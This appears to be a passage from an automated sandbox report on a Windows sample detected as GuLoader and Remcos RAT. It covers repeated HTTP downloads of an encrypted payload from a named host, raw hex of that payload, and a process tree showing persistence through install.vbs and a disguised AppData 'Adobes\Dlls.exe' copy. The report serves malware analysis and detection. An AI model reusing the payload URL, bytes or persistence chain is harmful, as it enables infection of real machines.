                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: implantecapilarpereira.com
                      Cache-Control: no-cache
                      Oct 14, 2021 08:40:31.921983004 CEST6788INHTTP/1.1 200 OK
                      Date: Thu, 14 Oct 2021 06:40:31 GMT
                      Server: Apache
                      Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT
                      Accept-Ranges: bytes
                      Content-Length: 470592
                      Content-Type: application/octet-stream
                      Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b
                      Data Ascii: 1X^\J?V|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f|F3|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WE*I_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:*65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.11.204981083.167.224.14780C:\Users\user\Desktop\mU9H96igb3.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:40:48.988596916 CEST7279OUTGET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: implantecapilarpereira.com
                      Cache-Control: no-cache
                      Oct 14, 2021 08:40:49.010281086 CEST7280INHTTP/1.1 200 OK
                      Date: Thu, 14 Oct 2021 06:40:48 GMT
                      Server: Apache
                      Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT
                      Accept-Ranges: bytes
                      Content-Length: 470592
                      Content-Type: application/octet-stream
                      Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b
                      Data Ascii: 1X^\J?V|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f|F3|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WE*I_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:*65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.11.204981183.167.224.14780C:\Users\user\Desktop\mU9H96igb3.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:40:55.734740019 CEST7775OUTGET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: implantecapilarpereira.com
                      Cache-Control: no-cache
                      Oct 14, 2021 08:40:55.757066011 CEST7777INHTTP/1.1 200 OK
                      Date: Thu, 14 Oct 2021 06:40:55 GMT
                      Server: Apache
                      Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT
                      Accept-Ranges: bytes
                      Content-Length: 470592
                      Content-Type: application/octet-stream
                      Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b
                      Data Ascii: 1X^\J?V|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f|F3|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WE*I_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:*65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;


                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:08:37:38
                      Start date:14/10/2021
                      Path:C:\Users\user\Desktop\mU9H96igb3.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\mU9H96igb3.exe'
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:08:38:19
                      Start date:14/10/2021
                      Path:C:\Users\user\Desktop\mU9H96igb3.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\mU9H96igb3.exe'
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:08:38:59
                      Start date:14/10/2021
                      Path:C:\Windows\SysWOW64\wscript.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                      Imagebase:0x330000
                      File size:147456 bytes
                      MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:08:39:00
                      Start date:14/10/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
                      Imagebase:0xf00000
                      File size:236544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:08:39:00
                      Start date:14/10/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7bf390000
                      File size:875008 bytes
                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:08:39:00
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 26%, Metadefender, Browse
                      • Detection: 24%, ReversingLabs
                      Reputation:low

                      General

                      Start time:08:39:09
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
                      Imagebase:0x70000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:08:39:17
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:08:39:25
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:08:39:45
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:08:40:04
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:08:40:12
                      Start date:14/10/2021
                      Path:C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
                      Imagebase:0x400000
                      File size:208896 bytes
                      MD5 hash:8777020A37B6797241A489A707B9784B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                      Disassembly

                      Code Analysis

                      Reset < >